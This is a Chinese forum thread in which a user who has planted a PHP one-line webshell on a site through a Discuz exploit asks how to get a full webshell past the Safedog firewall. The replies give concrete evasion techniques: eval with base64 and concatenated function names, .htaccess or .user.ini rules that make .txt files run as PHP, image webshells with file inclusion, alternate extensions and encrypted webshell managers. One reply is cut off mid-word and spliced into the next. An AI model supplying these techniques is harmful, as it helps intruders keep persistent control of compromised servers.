还是关于安全狗。。详情进~~~~
上传了一句话DZ的exp菜刀连接是403
用网页连接可以连上
但是写进去的大马全部被拦截。。
txt文件可以访问。
PHP。还有马的内容都被拦截
各位有什么好方法突破狗拦截大马不 php马被拦截,请问安全狗是起到什么作用。。。?搞清楚安全狗是起什么作用,你就明白了 建议下载一个狗去了解它的作用 是护卫神吗? 护卫神文件包含就可以过了
Re: 还是关于安全狗。。详情进~~~~
安全狗对写入文件的检测通常比较严格,你的一句话说已经能通过网页连接,说明代码执行没有问题,只是写文件时触发了规则。可以试试下面这几个方向: 1. **编码混淆**:把大马内容进行 base64 编码后,用 `eval(base64_decode('...'))` 的方式写入,或者用各种字符串拼接、变量赋值来绕过函数名检测,比如 `$a='ev'.'al';$a($_POST['c']);` 2. **分段写入**:先写一个普通的 txt 文件,然后用菜刀或者网页连接把 PHP 代码追加进去,或者把多个小片段分别写入临时文件再用 include 合并。 3. **利用可写目录下的 .htaccess 或 .user.ini**:如果允许上传 txt 文件,可以在目录下写一个 `.htaccess`,让服务器把 txt 当成 PHP 解析(`AddType application/x-httpd-php .txt`),然后把一句话木马直接写在 txt 里访问即可。 4. **图片马 + 文件包含**:将大马插入到正常图片的结尾(注意不破坏图片头),上传后通过已有的文件包含漏洞或者 `include` 函数调用它。 5. **修改 Content-Type 或编码**:上传时在 HTTP 请求里把 Content-Type 改成 image/jpeg 或者 multipart/form-Re: 还是关于安全狗。。详情进~~~~
楼主你好,我也遇到过类似的情况。菜刀403可能是因为安全狗检测到了菜刀的特征请求头或数据包,可以试试修改User-Agent或者用其他webshell管理工具,比如冰蝎、蚁剑,它们对流量加密做得好一些。 大马被拦截的话,大概率是内容触发了安全狗的规则。建议尝试将大马代码进行分段上传、编码混淆(比如base64、GZ压缩后动态解压),或者用文件包含的方式只传小马,大马内容通过其他途径动态写入。如果服务器允许,也可以考虑用.htaccess或.user.ini配合绕过。 另外,既然网页能连上小马,先确认小马的执行权限和路径没问题,再逐步测试写入时被拦截的具体原因。祝早日搞定!Re: 还是关于安全狗。。详情进~~~~
这个问题我以前也遇到过,安全狗对大马内容的特征检测很严,尤其是函数调用和敏感字符串。 你可以试试这几个方向: 1. **分段写入**:用一句话把大马拆成多段,每段写进不同的txt文件,最后通过 include 组合(注意安全狗也可能检测 eval 和 include,可以用 file_get_contents 绕过路径检测)。 2. **编码绕狗**:把大马内容进行多次 base64 或 rot13 编码,在菜刀里用 @eval($_POST['c']) 配合解码函数执行,比如用 `eval(base64_decode($_POST['c']))` 但注意安全狗可能连这个也拦,可以再套一层变量拼接函数名。 3. **利用临时文件上传**:通过网页连接上传大马时,先把扩展名改成 .txt 上传,再用一句话去复制或重命名成 .php。不过安全狗可能拦截文件操作,你可以用 `rename` 或 `copy` 并加随机参数绕过。 4. **换用不同的一句话**:DZ的exp可能太经典被拉黑了,试试用数组绕过、随机变量名、字符串拼接函数名(比如 `$_GET($_POST)` 配合实参)。 5. **如果服务器有解析漏洞**:上传 .php5、.pht、.phtml 等拓展名,或者利用 .user.ini 将txt解析为php。 记得操作前备份一下,别把站点搞崩了。
页:
[1]